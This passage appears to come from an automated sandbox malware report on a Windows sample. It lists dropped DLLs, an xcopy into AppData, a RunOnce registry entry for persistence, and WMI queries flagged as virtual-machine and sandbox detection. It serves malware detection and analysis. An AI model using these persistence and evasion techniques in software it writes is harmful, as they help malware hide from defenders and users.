                          Source: C:\Users\user\AppData\Roaming\im\ast.exeCode function: 10_2_6B90AE50 WSAStartup,WSACleanup,GetModuleHandleA,GetProcAddress,_strpbrk,LoadLibraryA,GetProcAddress,GetSystemDirectoryA,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,if_nametoindex,QueryPerformanceFrequency,10_2_6B90AE50
                          Source: is-4POLO.tmp.3.drStatic PE information: section name: .rodata
                          Source: is-82POG.tmp.3.drStatic PE information: section name: .textbss
                          Source: is-82POG.tmp.3.drStatic PE information: section name: .msvcjmc
                          Source: is-82POG.tmp.3.drStatic PE information: section name: .00cfg
                          Source: is-SD6OU.tmp.3.drStatic PE information: section name: .00cfg
                          Source: is-UA1D6.tmp.3.drStatic PE information: section name: .00cfg
                          Source: is-ND9BQ.tmp.3.drStatic PE information: section name: .code
                          Source: quartz.dll.9.drStatic PE information: section name: .code
                          Source: astrct.dll.9.drStatic PE information: section name: .rodata
                          Source: hatls.dll.9.drStatic PE information: section name: .textbss
                          Source: hatls.dll.9.drStatic PE information: section name: .msvcjmc
                          Source: hatls.dll.9.drStatic PE information: section name: .00cfg
                          Source: libcrypto-1_1.dll.9.drStatic PE information: section name: .00cfg
                          Source: libssl-1_1.dll.9.drStatic PE information: section name: .00cfg
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeCode function: 10_2_6B939F78 push ecx; ret 10_2_6B939F76
                          Source: is-88TFK.tmp.3.drStatic PE information: section name: .text entropy: 6.95576372950548
                          Source: msvcr120.dll.9.drStatic PE information: section name: .text entropy: 6.95576372950548
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpFile created: C:\Users\user\AppData\Local\Temp\mo6x\is-2G518.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpFile created: C:\Users\user\AppData\Local\Temp\mo6x\is-VCJTB.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpFile created: C:\Users\user\AppData\Local\Temp\mo6x\is-KGLTC.tmpJump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\im\aw_sas32.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpFile created: C:\Users\user\AppData\Local\Temp\mo6x\quartz.dll (copy)Jump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\im\libjpeg-turbo-win.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpFile created: C:\Users\user\AppData\Local\Temp\mo6x\is-951GK.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpFile created: C:\Users\user\AppData\Local\Temp\mo6x\astclient.dll (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpFile created: C:\Users\user\AppData\Local\Temp\mo6x\msvcr120.dll (copy)Jump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\im\quartz.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpFile created: C:\Users\user\AppData\Local\Temp\mo6x\libssl-1_1.dll (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpFile created: C:\Users\user\AppData\Local\Temp\mo6x\is-PDD2G.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpFile created: C:\Users\user\AppData\Local\Temp\mo6x\aw_sas32.dll (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpFile created: C:\Users\user\AppData\Local\Temp\is-H2GRU.tmp\_isetup\_setup64.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpFile created: C:\Users\user\AppData\Local\Temp\mo6x\AstCrp.dll (copy)Jump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\im\opus.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpFile created: C:\Users\user\AppData\Local\Temp\mo6x\is-82POG.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpFile created: C:\Users\user\AppData\Local\Temp\mo6x\libcryptoMD.dll (copy)Jump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\im\hatls.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpFile created: C:\Users\user\AppData\Local\Temp\mo6x\hatls.dll (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmpFile created: C:\Users\user\AppData\Local\Temp\is-1C94S.tmp\_isetup\_setup64.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpFile created: C:\Users\user\AppData\Local\Temp\mo6x\ast.exe (copy)Jump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\im\libcryptoMD.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpFile created: C:\Users\user\AppData\Local\Temp\mo6x\libcurl.dll (copy)Jump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\im\msvcr120.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpFile created: C:\Users\user\AppData\Local\Temp\mo6x\is-88TFK.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpFile created: C:\Users\user\AppData\Local\Temp\mo6x\is-ERH6U.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpFile created: C:\Users\user\AppData\Local\Temp\mo6x\is-JCPUK.tmpJump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\im\libeay32.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpFile created: C:\Users\user\AppData\Local\Temp\is-H2GRU.tmp\_isetup\_iscrypt.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmpFile created: C:\Users\user\AppData\Local\Temp\is-1C94S.tmp\_isetup\_iscrypt.dllJump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\im\libcrypto-1_1.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpFile created: C:\Users\user\AppData\Local\Temp\mo6x\is-5IUGA.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpFile created: C:\Users\user\AppData\Local\Temp\mo6x\libjpeg-turbo-win.dll (copy)Jump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\im\astrct.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpFile created: C:\Users\user\AppData\Local\Temp\mo6x\libeay32.dll (copy)Jump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\im\astclient.dllJump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\im\libssl-1_1.dllJump to dropped file
                          Source: C:\Users\user\Desktop\wjpP1EOX0L.exeFile created: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpFile created: C:\Users\user\AppData\Local\Temp\mo6x\is-SD6OU.tmpJump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\im\ast.exeJump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\im\AstCrp.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpFile created: C:\Users\user\AppData\Local\Temp\mo6x\is-UA1D6.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpFile created: C:\Users\user\AppData\Local\Temp\mo6x\is-4POLO.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpFile created: C:\Users\user\AppData\Local\Temp\mo6x\astrct.dll (copy)Jump to dropped file
                          Source: C:\Users\user\Desktop\wjpP1EOX0L.exeFile created: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpFile created: C:\Users\user\AppData\Local\Temp\mo6x\is-2EBQK.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpFile created: C:\Users\user\AppData\Local\Temp\mo6x\libcrypto-1_1.dll (copy)Jump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\im\libcurl.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpFile created: C:\Users\user\AppData\Local\Temp\mo6x\is-ND9BQ.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpFile created: C:\Users\user\AppData\Local\Temp\mo6x\opus.dll (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce asgJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce asgJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce asgJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce asgJump to behavior
                          Source: C:\Users\user\Desktop\wjpP1EOX0L.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\wjpP1EOX0L.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                          Malware Analysis System Evasion

                          barindex
                          Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_NetworkAdapter
                          Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
